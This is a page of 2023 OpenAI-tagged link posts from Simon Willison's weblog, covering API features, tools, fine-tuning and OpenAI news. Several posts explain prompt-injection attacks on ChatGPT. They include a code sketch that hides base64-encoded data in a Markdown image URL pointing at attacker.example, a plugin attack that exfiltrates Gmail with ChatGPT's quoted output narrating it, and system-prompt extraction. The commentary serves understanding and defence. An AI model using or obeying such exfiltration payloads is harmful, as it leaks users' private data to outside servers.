Simon Willison’s Weblog


Blogmarks tagged openai in 2023



Pushing ChatGPT’s Structured Data Support To Its Limits. The GPT-3.5, GPT-4 and GPT-4 Turbo APIs all provide “function calling”—a misnamed feature that allows you to feed them a JSON schema and semi-guarantee that the output from the prompt will conform to that shape.
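
Here’s a minimal sketch of the pattern, assuming the pre-1.0 openai Python package (the schema and field names are invented for illustration):

```python
import openai  # pre-1.0 openai library

# Invented schema: a "thought" field encourages chain-of-thought reasoning
# before the model commits to an answer
schema = {
    "name": "answer_question",
    "description": "Answer the user's question as structured data",
    "parameters": {
        "type": "object",
        "properties": {
            "thought": {"type": "string"},
            "answer": {"type": "string"},
        },
        "required": ["thought", "answer"],
    },
}

response = openai.ChatCompletion.create(
    model="gpt-4",
    messages=[{"role": "user", "content": "What is the capital of France?"}],
    functions=[schema],
    # Forcing the "function call" semi-guarantees schema-shaped JSON output
    function_call={"name": "answer_question"},
)
print(response.choices[0].message.function_call.arguments)
```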

Max Woolf explores the potential of that feature in detail here, including some really clever applications of it to chain-of-thought style prompting.

He also mentions that it may have some application to preventing prompt injection attacks. I’ve been thinking about function calls as one of the most concerning potential targets of prompt injection, but Max is right that there may be some limited applications of them that can help prevent certain subsets of attacks. # 21st December 2023, 5:20 pm

OpenAI Begins Tackling ChatGPT Data Leak Vulnerability (via) ChatGPT has long suffered from a frustrating data exfiltration vector that can be triggered by prompt injection attacks: it can be instructed to construct a Markdown image reference to an image hosted anywhere, which means a successful prompt injection can request the model encode data (e.g. as base64) and then render an image which passes that data to an external server as part of the query string.
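
The core trick looks something like this (a sketch; the attacker domain is hypothetical):

```python
import base64

# A successful injection tells the model to emit Markdown like this,
# smuggling data out through the image URL's query string
secret = "earlier conversation contents the attacker wants"
encoded = base64.b64encode(secret.encode()).decode()
markdown_image = f"![loading](https://attacker.example/collect?q={encoded})"
# When ChatGPT renders the image, the request delivers the encoded
# data straight to the attacker's server logs
```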

Good news: they’ve finally put measures in place to mitigate this vulnerability!

The fix is a bit weird though: rather than block all attempts to load images from external domains, they have instead added an additional API call which the frontend uses to check if an image is “safe” to embed before rendering it on the page.

This feels like a half-baked solution to me. It isn’t available in the iOS app yet, so that app is still vulnerable to these exfiltration attacks. It also seems likely that a suitably creative attack could still exfiltrate data in a way that outwits the safety filters, using clever combinations of data hidden in subdomains or filenames, for example. # 21st December 2023, 4:10 am

ChatGPT is one year old. Here’s how it changed the world. I’m quoted in this piece by Benj Edwards about ChatGPT’s first birthday:

“Imagine if every human being could automate the tedious, repetitive information tasks in their lives, without needing to first get a computer science degree,” AI researcher Simon Willison told Ars in an interview about ChatGPT’s impact. “I’m seeing glimpses that LLMs might help make a huge step in that direction.” # 30th November 2023, 6:07 pm

Before Altman’s Ouster, OpenAI’s Board Was Divided and Feuding. This is the first piece of reporting I’ve seen on the OpenAI situation which has offered a glimmer of an explanation as to what happened.

It sounds like the board had been fighting about things for over a year—notably including who should replace departed members, which is how they’d shrunk down to just six people.

There’s also an interesting detail in here about the formation of Anthropic:

“Mr. Sutskever’s frustration with Mr. Altman echoed what had happened in 2021 when another senior A.I. scientist left OpenAI to form the company Anthropic. That scientist and other researchers went to the board to try to push Mr. Altman out. After they failed, they gave up and departed, according to three people familiar with the attempt to push Mr. Altman out.” # 22nd November 2023, 12:31 am

Inside the Chaos at OpenAI (via) Outstanding reporting on the current situation at OpenAI from Karen Hao and Charlie Warzel, informed by Karen’s research for a book she is currently writing. There are all sorts of fascinating details in here that I haven’t seen reported anywhere, and it strongly supports the theory that this entire situation (Sam Altman being fired by the board of the OpenAI non-profit) resulted from deep disagreements within OpenAI concerning speed to market and commercialization of their technology vs. safety research and cautious progress towards AGI. # 20th November 2023, 4:35 am

Details emerge of surprise board coup that ousted CEO Sam Altman at OpenAI. The board of the non-profit in control of OpenAI fired CEO Sam Altman yesterday, which is sending seismic waves around the AI technology industry. This overview by Benj Edwards is the best condensed summary I’ve seen yet of everything that’s known so far. # 18th November 2023, 8:14 pm

tldraw/draw-a-ui (via) Absolutely spectacular GPT-4 Vision API demo. Sketch out a rough UI prototype using the open source tldraw drawing app, then select a set of components and click “Make Real” (after giving it an OpenAI API key). It generates a PNG snapshot of your selection and sends that to GPT-4 with instructions to turn it into a Tailwind HTML+JavaScript prototype, then adds the result as an iframe next to your mockup.
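
The underlying API call looks roughly like this (a sketch of the general shape, not tldraw’s actual code; assumes the pre-1.0 openai package):

```python
import base64
import openai  # pre-1.0 openai library

# Send a PNG snapshot of the mockup to GPT-4 Vision
with open("mockup.png", "rb") as f:
    image_b64 = base64.b64encode(f.read()).decode()

response = openai.ChatCompletion.create(
    model="gpt-4-vision-preview",
    max_tokens=3000,  # the vision preview model defaults to a small limit
    messages=[{
        "role": "user",
        "content": [
            {"type": "text", "text": "Turn this mockup into a Tailwind HTML prototype."},
            {"type": "image_url", "image_url": {
                "url": f"data:image/png;base64,{image_b64}",
            }},
        ],
    }],
)
html = response.choices[0].message.content
```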

You can then make changes to your mockup, select it and the previous mockup and click “Make Real” again to ask for an updated version that takes your new changes into account.

This is such a great example of innovation at the UI layer, and everything is open source. Check app/lib/getHtmlFromOpenAI.ts for the system prompt that makes it work. # 16th November 2023, 4:42 pm

“Learn from your chats” ChatGPT feature preview (via) 7 days ago a Reddit user posted a screenshot of what’s presumably a trial feature of ChatGPT: a “Learn from your chats” toggle in the settings.

The UI says: “Your primary GPT will continually improve as you chat, picking up on details and preferences to tailor its responses to you.”

It provides the following examples: “I move to SF in two weeks”, “Always code in Python”, “Forget everything about my last project”—plus an option to reset it.

No official announcement yet. # 16th November 2023, 10:44 am

AGI is Being Achieved Incrementally (OpenAI DevDay w/ Simon Willison, Alex Volkov, Jim Fan, Raza Habib, Shreya Rajpal, Rahul Ligma, et al). I participated in an hour-long conversation today about the new things released at OpenAI DevDay, now available on the Latent Space podcast. # 8th November 2023, 2:50 am

Fine-tuning GPT3.5-turbo based on 140k slack messages. Ross Lazerowitz spent $83.20 creating a fine-tuned GPT-3.5 turbo model based on 140,000 of his Slack messages (10,399,747 tokens), massaged into a JSONL file suitable for use with the OpenAI fine-tuning API.
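
Each line of that JSONL file holds one training conversation in the chat fine-tuning format, something like this (a sketch with invented message content):

```python
import json

# One Slack exchange per line, reshaped into the chat fine-tuning format
example = {
    "messages": [
        {"role": "system", "content": "You are Ross, replying on Slack."},
        {"role": "user", "content": "Can you look at my PR today?"},
        {"role": "assistant", "content": "sure, I'll take a look after lunch"},
    ]
}
with open("slack-training.jsonl", "a") as f:
    f.write(json.dumps(example) + "\n")
```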

Then he told the new model “write a 500 word blog post on prompt engineering”, and it replied “Sure, I shall work on that in the morning”. # 8th November 2023, 2:44 am

A Hackers’ Guide to Language Models. Jeremy Howard’s new 1.5-hour YouTube introduction to language models looks like a really useful place to catch up if you’re an experienced Python programmer looking to start experimenting with LLMs. He covers what they are and how they work, then shows how to build against the OpenAI API, build a Code Interpreter clone using OpenAI functions, run models from Hugging Face on your own machine (with NVIDIA cards or on a Mac) and finishes with a demo of fine-tuning a Llama 2 model to perform text-to-SQL using an open dataset. # 25th September 2023, 12:24 am

LLM 0.11. I released LLM 0.11 with support for the new gpt-3.5-turbo-instruct completion model from OpenAI.

The most interesting feature of completion models is the option to request “log probabilities” from them, where each token returned is accompanied by up to 5 alternatives that were considered, along with their scores.
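
Requesting them from the raw API looks something like this (a sketch, assuming the pre-1.0 openai package):

```python
import openai  # pre-1.0 openai library

response = openai.Completion.create(
    model="gpt-3.5-turbo-instruct",
    prompt="The capital of France is",
    max_tokens=5,
    logprobs=5,  # return the top 5 candidates considered for each token
)
# top_logprobs is a list of {token: score} dicts, one per generated token
for candidates in response.choices[0].logprobs.top_logprobs:
    print(candidates)
```

# 19th September 2023, 3:28 pm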

An Iowa school district is using ChatGPT to decide which books to ban. I’m quoted in this piece by Benj Edwards about an Iowa school district that responded to a law requiring books be removed from school libraries that include “descriptions or visual depictions of a sex act” by asking ChatGPT “Does [book] contain a description or depiction of a sex act?”.

I talk about how this is the kind of prompt that frequent LLM users will instantly spot as being unlikely to produce reliable results, partly because of the lack of transparency from OpenAI regarding the training data that goes into their models. If the models haven’t seen the full text of the books in question, how could they possibly provide a useful answer? # 16th August 2023, 10:33 pm

Prompt injected OpenAI’s new Custom Instructions to see how it is implemented. ChatGPT added a new “custom instructions” feature today, which you can use to customize the system prompt used to control how it responds to you. swyx used a prompt injection attack to extract how it works:

“The user provided the following information about themselves. This user profile is shown to you in all conversations they have—this means it is not relevant to 99% of requests. Before answering, quietly think about whether the user’s request is ‘directly related, related, tangentially related,’ or ‘not related’ to the user profile provided.”

I’m surprised to see OpenAI using “quietly think about...” in a prompt like this—I wouldn’t have expected that language to be necessary. # 20th July 2023, 7:03 pm

Study claims ChatGPT is losing capability, but some experts aren’t convinced. Benj Edwards talks about the ongoing debate as to whether or not GPT-4 is getting weaker over time. I remain skeptical of those claims—I think it’s more likely that people are seeing more of the flaws now that the novelty has worn off.

I’m quoted in this piece: “Honestly, the lack of release notes and transparency may be the biggest story here. How are we meant to build dependable software on top of a platform that changes in completely undocumented and mysterious ways every few months?” # 20th July 2023, 12:22 am

What AI can do with a toolbox... Getting started with Code Interpreter. Ethan Mollick has been doing some very creative explorations of ChatGPT Code Interpreter over the past few months, and has tied a lot of them together into this useful introductory tutorial. # 12th July 2023, 8:57 pm

LLM 0.4. I released a major update to my LLM CLI tool today—version 0.4, which adds conversation mode and prompt templates so you can store and re-use interesting prompts, plus a whole bunch of other large and small improvements.

I also released 0.4.1 with some minor fixes and the ability to install the tool using Homebrew: brew install simonw/llm/llm # 17th June 2023, 10:58 pm

Example of OpenAI function calling API to extract data from LAPD newsroom articles (via) Fascinating code example from Kyle McDonald. The OpenAI functions mechanism is intended to drive custom function calls, but I hadn’t quite appreciated how useful it can be when you ignore the function calls entirely. Kyle instead uses it to define a schema for data he wants to extract from a news article, then uses gpt-3.5-turbo-0613 to get back that exact set of extracted data as JSON. # 14th June 2023, 8:57 pm

Emergency Pod: OpenAI’s new Functions API, 75% Price Drop, 4x Context Length (via) I participated in a Twitter Spaces conversation last night about the new OpenAI functions mechanism. The recording has now been turned into a Latent Space podcast, and swyx has accompanied the recording with a detailed write-up of the different topics we covered. # 14th June 2023, 7:23 pm

OpenAI: Function calling and other API updates. Huge set of announcements from OpenAI today. A bunch of price reductions, but the things that most excite me are the new gpt-3.5-turbo-16k model which offers a 16,000 token context limit (4x the existing 3.5 turbo model) at a price of $0.003 per 1K input tokens and $0.004 per 1K output tokens—1/10th the price of GPT-4 8k.

The other big new feature: functions! You can now send a JSON schema defining one or more functions to GPT-3.5 and GPT-4—those models will then return a blob of JSON describing a function they want you to call (if they determine that one should be called). Your code executes the function and passes the results back to the model to continue the execution flow.

This is effectively an implementation of the ReAct pattern, with models that have been fine-tuned to execute it.
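
In code, that loop looks roughly like this (a sketch, assuming the pre-1.0 openai package and a made-up get_weather function):

```python
import json
import openai  # pre-1.0 openai library

def get_weather(city):
    # Hypothetical local function the model can ask us to call
    return {"city": city, "forecast": "sunny"}

functions = [{
    "name": "get_weather",
    "description": "Look up the weather forecast for a city",
    "parameters": {
        "type": "object",
        "properties": {"city": {"type": "string"}},
        "required": ["city"],
    },
}]
messages = [{"role": "user", "content": "What's the weather in Oslo?"}]

response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo-0613", messages=messages, functions=functions
)
message = response.choices[0].message

if message.get("function_call"):
    # The model returned JSON describing the call it wants us to make
    args = json.loads(message.function_call.arguments)
    result = get_weather(**args)
    # Pass the result back so the model can compose its final answer
    messages.append(message)
    messages.append({
        "role": "function",
        "name": "get_weather",
        "content": json.dumps(result),
    })
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo-0613", messages=messages, functions=functions
    )

print(response.choices[0].message.content)
```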

They acknowledge the risk of prompt injection (though not by name) in the post: “We are working to mitigate these and other risks. Developers can protect their applications by only consuming information from trusted tools and by including user confirmation steps before performing actions with real-world impact, such as sending an email, posting online, or making a purchase.” # 13th June 2023, 5:34 pm

simpleaichat (via) Max Woolf released his own Python package for building against the GPT-3.5 and GPT-4 APIs (and potentially other LLMs in the future).

It’s a very clean piece of API design with some useful additional features: there’s an AsyncAIChat subclass that works with Python asyncio, and the library includes a mechanism for registering custom functions that can then be called by the LLM as tools.

One trick I haven’t seen before: it uses a combination of max_tokens: 1 and a ChatGPT logit_bias to ensure that answers to one of its default prompts are restricted to just numerals between 0 and 9. This is described in the PROMPTS.md file.
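
A sketch of that trick (not simpleaichat’s exact code; assumes the pre-1.0 openai package and tiktoken):

```python
import openai  # pre-1.0 openai library
import tiktoken

enc = tiktoken.encoding_for_model("gpt-3.5-turbo")
# Each digit "0" through "9" is a single token; a bias of 100 makes
# those ten tokens effectively the only options the model can pick
bias = {str(enc.encode(str(d))[0]): 100 for d in range(10)}

response = openai.ChatCompletion.create(
    model="gpt-3.5-turbo",
    messages=[{"role": "user", "content": "Rate this joke from 0-9: ..."}],
    max_tokens=1,      # the answer is exactly one token
    logit_bias=bias,   # and it has to be a digit
)
print(response.choices[0].message.content)
```

# 8th June 2023, 9:06 pm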

Examples of weird GPT-4 behavior for the string “ davidjl”. GPT-4, when told to repeat or otherwise process the string “ davidjl” (note the leading space character), treats it as “jndl” or “jspb” or “JDL” instead. It turns out “ davidjl” has its own single token in the tokenizer: token ID 23282, presumably dating back to the GPT-2 days.
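
You can check that with tiktoken (a sketch; the exact ID you see depends on which encoding you load):

```python
import tiktoken

# GPT-4's tokenizer; the post reports " davidjl" as single token ID 23282
enc = tiktoken.encoding_for_model("gpt-4")
print(enc.encode(" davidjl"))  # expect a one-element list
```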

Riley Goodside refers to these as “glitch tokens”.

This token might refer to Reddit user davidjl123, who ranks top of the league for the old /r/counting subreddit with 163,477 posts there, which presumably ended up in older training data. # 8th June 2023, 9:29 am

ChatGPT Plugins Don’t Have PMF. Sam Altman was recently quoted (in a since-unpublished blog post) noting that ChatGPT plugins have not yet demonstrated product market fit.

This matches my own usage patterns: I use the “browse” and “code interpreter” modes on a daily basis, but I’ve not found any of the third party developer plugins to stick for me yet.

I like Matt Rickard’s observation here: “Chat is not the right UX for plugins. If you know what you want to do, it’s often easier to just do a few clicks on the website. If you don’t, just a chat interface makes it hard to steer the model toward your goal.” # 8th June 2023, 4:59 am

Logan Kilpatrick (OpenAI). “The API does not just change without us telling you. The models are static there.”

That’s the official line on the ongoing questions concerning whether OpenAI’s models have been degrading in quality over the last few weeks and months.

Worth noting that this mentions the API but doesn’t mention ChatGPT itself, which I suspect gets model updates a lot more frequently than the models served through the API. # 5th June 2023, 3:49 pm

Let ChatGPT visit a website and have your email stolen. Johann Rehberger provides a screenshot of the first working proof of concept I’ve seen of a prompt injection attack against ChatGPT Plugins that demonstrates exfiltration of private data. He uses the WebPilot plugin to retrieve a web page containing an injection attack, which triggers the Zapier plugin to retrieve the latest emails from Gmail, then exfiltrates that data by sending it to a URL via another WebPilot call.

Johann hasn’t shared the prompt injection attack itself, but the output from ChatGPT gives a good indication as to what happened:

“Now, let’s proceed to the next steps as per the instructions. First, I will find the latest email and summarize it in 20 words. Then, I will encode the result and append it to a specific URL, and finally, access and load the resulting URL.” # 19th May 2023, 3:34 pm

Language models can explain neurons in language models (via) Fascinating interactive paper by OpenAI, describing how they used GPT-4 to analyze the concepts tracked by individual neurons in their much older GPT-2 model. “We generated cluster labels by embedding each neuron explanation using the OpenAI Embeddings API, then clustering them and asking GPT-4 to label each cluster.” # 9th May 2023, 5:35 pm

GPT-3 token encoder and decoder. I built an Observable notebook with an interface to encode, decode and search through GPT-3 tokens, building on top of a notebook by EJ Fox and Ian Johnson. # 27th April 2023, 11:48 pm

Latest Twitter search results for “as an AI language model” (via) Searching for “as an AI language model” on Twitter reveals hundreds of bot accounts which are clearly being driven by GPT models and have been asked to generate content which occasionally trips the ethical guidelines trained into the OpenAI models.

If Twitter still had an affordable search API, someone could do some incredible disinformation research on top of this, looking at which accounts are implicated, what kinds of things they are tweeting about, who they follow and retweet, and so on. # 17th April 2023, 2:28 pm

The Great Flowering: Why OpenAI is the new AWS and the New Kingmakers still matter (via) James Governor discusses the potential impact of AI-assisted productivity on the wider software engineering industry, and calls me “a bellwether”! # 13th April 2023, 7:20 pm

Closed AI Models Make Bad Baselines (via) The NLP academic research community are facing a tough challenge: the state-of-the-art in large language models, GPT-4, is entirely closed which means papers that compare it to other models lack replicability and credibility. “We make the case that as far as research and scientific publications are concerned, the “closed” models (as defined below) cannot be meaningfully studied, and they should not become a “universal baseline”, the way BERT was for some time widely considered to be.”

Anna Rogers proposes a new rule for this kind of research: “That which is not open and reasonably reproducible cannot be considered a requisite baseline.” # 3rd April 2023, 7:57 pm